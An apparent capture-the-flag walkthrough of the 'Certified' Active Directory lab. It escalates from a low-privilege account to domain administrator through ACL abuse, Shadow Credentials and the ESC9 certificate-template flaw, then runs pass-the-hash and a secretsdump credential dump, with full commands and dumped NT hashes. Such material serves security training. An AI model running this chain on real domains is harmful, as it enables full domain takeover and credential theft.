Basic information

This week's machine tries a new format: you are handed a low-privileged username and password up front.

As is common in real life Windows pentests, you will start the Certified box with credentials for the following account: judith.mader / judith09

Port scan

No web ports, just the usual domain-controller ports. Two things in the scan matter later: SMB signing is required (so no NTLM relay), and the DC clock is about 6h47m ahead of the scanner, which will make Kerberos-based tools fail with a clock-skew error until the local clock is synced to the DC:

$ nmap -sC -sV -Pn 10.10.11.41
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-04 13:28 CST
Nmap scan report for 10.10.11.41
Host is up (0.070s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-04 12:16:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-04T12:18:18+00:00; +6h47m20s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-11-04T12:18:18+00:00; +6h47m21s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-11-04T12:18:18+00:00; +6h47m20s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-11-04T12:18:18+00:00; +6h47m21s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-11-04T12:17:40
|_ start_date: N/A
|_clock-skew: mean: 6h47m20s, deviation: 0s, median: 6h47m20s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.85 seconds

BloodHound

Since we already have a low-privileged account, add the hosts entry and go straight to BloodHound collection and analysis:

10.10.11.41 certified.htb dc01.certified.htb

bloodhound-python -u judith.mader -p judith09 -d certified.htb -c All -dc DC01.certified.htb -gc DC01.certified.htb --zip --dns-tcp -ns 10.10.11.41

One path stands out clearly: judith.mader has WriteOwner over the Management group, and the Management group has GenericWrite over management_svc:

So judith.mader first abuses WriteOwner to make herself the owner of Management, then grants herself the right to add members and adds herself to the group, and finally abuses the group's GenericWrite over management_svc to take over management_svc.
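The same reasoning, done programmatically, as an added example (not code from the write-up or from BloodHound): a breadth-first search over a hand-constructed BloodHound-style edge list that only follows edges granting control of the target, and then prints the abuse each hop calls for. The edge list and the abuse descriptions are constructed for this box; BloodHound's real JSON export uses a different, richer schema.

```python
"""Walk a BloodHound-style ACL graph to recover the chain the write-up follows.

Added example: not code from the write-up or from BloodHound. The edge list
below is constructed by hand (BloodHound's own export has a different
schema); a hand-built list keeps the script runnable offline.
"""
from collections import deque

# Edge kinds that hand control of the target to the source, with the abuse a
# practitioner would reach for. MemberOf is traversable because a member
# inherits the group's outgoing rights once the membership takes effect.
CONTROL_EDGES = {
    "WriteOwner":   "take ownership, grant self WriteMembers on the DACL, add self as member",
    "AddMember":    "add self as member",
    "GenericWrite": "Shadow Credentials via msDS-KeyCredentialLink, or targeted Kerberoast via an SPN",
    "GenericAll":   "Shadow Credentials, password reset, or rewrite attributes such as the UPN",
    "MemberOf":     "inherit the group's rights",
}

# Constructed edge list (source, kind, target) mirroring this box's path, plus
# a couple of distractors BloodHound would also draw. HasSession is not a
# control edge and must be ignored by the search.
EDGES = [
    ("JUDITH.MADER@CERTIFIED.HTB",   "MemberOf",     "DOMAIN USERS@CERTIFIED.HTB"),
    ("JUDITH.MADER@CERTIFIED.HTB",   "WriteOwner",   "MANAGEMENT@CERTIFIED.HTB"),
    ("MANAGEMENT@CERTIFIED.HTB",     "GenericWrite", "MANAGEMENT_SVC@CERTIFIED.HTB"),
    ("MANAGEMENT_SVC@CERTIFIED.HTB", "GenericAll",   "CA_OPERATOR@CERTIFIED.HTB"),
    ("DC01.CERTIFIED.HTB",           "HasSession",   "ADMINISTRATOR@CERTIFIED.HTB"),
]


def build_graph(edges):
    """Adjacency list: source -> [(kind, target), ...]."""
    graph = {}
    for src, kind, dst in edges:
        graph.setdefault(src, []).append((kind, dst))
    return graph


def find_control_path(edges, start, goal):
    """Breadth-first search over control edges only; returns the list of
    (source, kind, target) hops, [] if start == goal, or None if no chain."""
    graph = build_graph(edges)
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for kind, nxt in graph.get(node, []):
            if kind not in CONTROL_EDGES or nxt in seen:
                continue
            seen.add(nxt)
            queue.append((nxt, path + [(node, kind, nxt)]))
    return None


def abuse_plan(path):
    """Turn a path into ordered, human-readable steps."""
    return [f"{i}. {src} -[{kind}]-> {dst}: {CONTROL_EDGES[kind]}"
            for i, (src, kind, dst) in enumerate(path, 1)]


if __name__ == "__main__":
    path = find_control_path(EDGES, "JUDITH.MADER@CERTIFIED.HTB", "CA_OPERATOR@CERTIFIED.HTB")
    print("\n".join(abuse_plan(path)))
```

Run as-is it prints the three-hop plan WriteOwner, GenericWrite, GenericAll, which is exactly the order the following sections execute by hand.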

management

Step one: abuse WriteOwner to make judith.mader the owner of the Management group:
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 set owner management judith.mader

Owning the object does not by itself grant membership changes, so as owner first write a WriteMembers ACE for yourself into the group's DACL (dacledit.py from the impacket examples), then add yourself to Management:
python3 examples/dacledit.py -action write -rights WriteMembers -principal judith.mader -target-dn "CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB" certified.htb/judith.mader:judith09

bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add groupMember management judith.mader

management_svc

Next, abuse the GenericWrite over management_svc. The simplest route is Shadow Credentials: write a key credential to msDS-KeyCredentialLink, authenticate with PKINIT and let Certipy recover the NT hash. PKINIT is Kerberos, so sync the clock to the DC first (the scan showed a skew of almost seven hours):

(Certipy version can bite here: 4.8.2 on macOS did not work for me, 4.4.0 on Kali did.)
sudo ntpdate -s 10.10.11.41
certipy shadow auto -username judith.mader@certified.htb -p judith09 -account management_svc -dc-ip 10.10.11.41

[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

CA_OPERATOR

Back to BloodHound: management_svc has GenericAll over CA_OPERATOR, so the same Shadow Credentials trick yields ca_operator:
certipy shadow auto -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator -dc-ip 10.10.11.41

[*] NT hash for 'ca_operator': b4b86f45c6018f1b664f70805f45d8f2

ADCS

The name ca_operator suggests a CA-related role, so look at AD CS; certipy find flags ESC9 on the certified-DC01-CA CA and the CertifiedAuthentication template:
certipy find -u 'ca_operator' -hashes b4b86f45c6018f1b664f70805f45d8f2 -dc-ip 10.10.11.41 -vulnerable -stdout

certified-DC01-CA
CertifiedAuthentication

ESC9

Reference:

ESC9 means the template carries the CT_FLAG_NO_SECURITY_EXTENSION enrollment flag, so certificates it issues lack the szOID_NTDS_CA_SECURITY_EXT SID extension, and the DC (not yet in full enforcement of strong certificate binding) falls back to mapping the certificate to an account by the UPN in its SAN alone. Since management_svc has GenericAll over ca_operator, we can temporarily set ca_operator's UPN to Administrator, enroll as ca_operator, restore the UPN so the certificate no longer resolves back to ca_operator, and then authenticate with it as Administrator. Adapting the commands from the referenced article:
# Change ca_operator's UPN to Administrator (GenericAll from management_svc)
certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator -dc-ip 10.10.11.41

# Request a certificate from the ESC9 template as ca_operator; the SAN now carries UPN=Administrator
certipy req -username ca_operator@certified.htb -hashes b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication

# Restore ca_operator's UPN so the certificate maps to the real Administrator, not back to ca_operator
certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb -dc-ip 10.10.11.41

# Authenticate with the certificate (PKINIT); this returns Administrator's TGT and NT hash
certipy auth -pfx administrator.pfx -domain certified.htb
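To see why these four steps work, and why the restore step and the missing SID extension both matter, here is a reduced model of the DC's certificate-to-account mapping as an added example. It is not code from the write-up, from Certipy or from Microsoft: the directory contents and SIDs are constructed, and the mapping rules are a simplified rendering of the Compatibility vs. Full Enforcement behaviour of strong certificate binding (altSecurityIdentities, chain validation and certificate validity are left out). The rule that a bare UPN without a domain suffix falls back to sAMAccountName is an assumption of this model.

```python
"""Simplified model of DC certificate mapping, showing the ESC9 UPN swap.

Added example, not code from the write-up, Certipy or Microsoft. The
directory below is constructed; the mapping rules are a reduced form of
strong certificate binding (Compatibility vs. Full Enforcement). The bare-UPN
to sAMAccountName fallback is an assumption of this model.
"""
from dataclasses import dataclass
from typing import Dict, Optional

SID_EXT_OID = "1.3.6.1.4.1.311.25.2"      # szOID_NTDS_CA_SECURITY_EXT
CT_FLAG_NO_SECURITY_EXTENSION = 0x80000   # bit in msPKI-Enrollment-Flag


@dataclass
class Account:
    sam: str
    sid: str
    upn: Optional[str]          # explicit userPrincipalName, None if unset


@dataclass
class Cert:
    san_upn: str                # UPN the CA copied from the requester into the SAN
    sid_ext: Optional[str]      # SID extension value, None when the template omits it


@dataclass
class Template:
    name: str
    enrollment_flag: int

    def omits_sid_extension(self) -> bool:
        return bool(self.enrollment_flag & CT_FLAG_NO_SECURITY_EXTENSION)


def enroll(template: Template, requester: Account) -> Cert:
    """The CA writes the requester's UPN into the SAN and, unless the template
    sets CT_FLAG_NO_SECURITY_EXTENSION, the requester's SID into the SID
    extension. ESC9 is precisely the case where that extension is absent."""
    sid = None if template.omits_sid_extension() else requester.sid
    return Cert(san_upn=requester.upn, sid_ext=sid)


def lookup_by_upn(directory: Dict[str, Account], upn: str) -> Optional[Account]:
    """Model assumption: an explicit userPrincipalName match wins; a value
    with no domain suffix is then tried as a sAMAccountName."""
    for acct in directory.values():
        if acct.upn is not None and acct.upn.lower() == upn.lower():
            return acct
    if "@" not in upn:
        return directory.get(upn.lower())
    return None


def map_certificate(cert: Cert, directory: Dict[str, Account],
                    full_enforcement: bool) -> Optional[Account]:
    """Account the DC maps the certificate to, or None if it is rejected.
    full_enforcement=False models Compatibility mode, True models
    StrongCertificateBindingEnforcement=2."""
    acct = lookup_by_upn(directory, cert.san_upn)
    if acct is None:
        return None
    if cert.sid_ext is not None:
        # A present SID extension is validated in every mode.
        return acct if cert.sid_ext == acct.sid else None
    # No SID extension: UPN-only (weak) mapping, accepted only before enforcement.
    return None if full_enforcement else acct


def esc9(directory: Dict[str, Account], template: Template, victim_sam: str,
         target_sam: str, full_enforcement: bool, restore_upn: bool = True) -> Optional[str]:
    """The four steps from the write-up; returns the sAMAccountName we end up as."""
    victim = directory[victim_sam]
    original_upn = victim.upn
    victim.upn = target_sam                    # 1. GenericAll over victim: rewrite its UPN
    cert = enroll(template, victim)            # 2. enroll as victim from the ESC9 template
    if restore_upn:
        victim.upn = original_upn              # 3. put the UPN back
    mapped = map_certificate(cert, directory, full_enforcement)  # 4. PKINIT with the cert
    return mapped.sam if mapped else None


def demo_directory() -> Dict[str, Account]:
    """Constructed directory; SIDs are made up."""
    return {
        "administrator": Account("administrator", "S-1-5-21-1-1-1-500", None),
        "ca_operator": Account("ca_operator", "S-1-5-21-1-1-1-1106", "ca_operator@certified.htb"),
    }


ESC9_TEMPLATE = Template("CertifiedAuthentication", CT_FLAG_NO_SECURITY_EXTENSION)
SAFE_TEMPLATE = Template("User", 0)

if __name__ == "__main__":
    print("compat, ESC9 template     :", esc9(demo_directory(), ESC9_TEMPLATE, "ca_operator", "Administrator", False))
    print("compat, UPN not restored  :", esc9(demo_directory(), ESC9_TEMPLATE, "ca_operator", "Administrator", False, restore_upn=False))
    print("full enforcement          :", esc9(demo_directory(), ESC9_TEMPLATE, "ca_operator", "Administrator", True))
    print("compat, SID ext present   :", esc9(demo_directory(), SAFE_TEMPLATE, "ca_operator", "Administrator", False))
```

The four runs show the whole story: the swap lands on administrator only when the template omits the SID extension and the DC is still in Compatibility mode; skipping the restore step maps the certificate back to ca_operator because its explicit UPN still matches; and either full enforcement or a template that embeds the SID makes the DC reject the certificate, which is the fix (remove the NO_SECURITY_EXTENSION flag from the template and move the DCs to StrongCertificateBindingEnforcement=2).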

Flags

From there, log in with the Administrator NT hash that certipy auth returned:
python3 examples/psexec.py Administrator@10.10.11.41 -hashes :0d5b49608bbce1751f708748f67e2d34

hashdump

$ python3 examples/secretsdump.py Administrator@10.10.11.41 -hashes :0d5b49608bbce1751f708748f67e2d34 -just-dc-ntlm
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:41c6e6d9e7fe3f175b42df14a3815969:::
certified.htb\judith.mader:1103:aad3b435b51404eeaad3b435b51404ee:8ec62ac86259004c121a7df4243a7a80:::
certified.htb\management_svc:1105:aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584:::
certified.htb\ca_operator:1106:aad3b435b51404eeaad3b435b51404ee:b4b86f45c6018f1b664f70805f45d8f2:::
certified.htb\alexander.huges:1601:aad3b435b51404eeaad3b435b51404ee:cde915082011eef6f107ab4384124983:::
certified.htb\harry.wilson:1602:aad3b435b51404eeaad3b435b51404ee:37a50354c4a799ace944d130ed34cd03:::
certified.htb\gregory.cameron:1603:aad3b435b51404eeaad3b435b51404ee:b7ef92685ee618fc477f6b7668a829af:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:8f3cbea3908ffcde111e6a077c37dac4:::
[*] Cleaning up...

References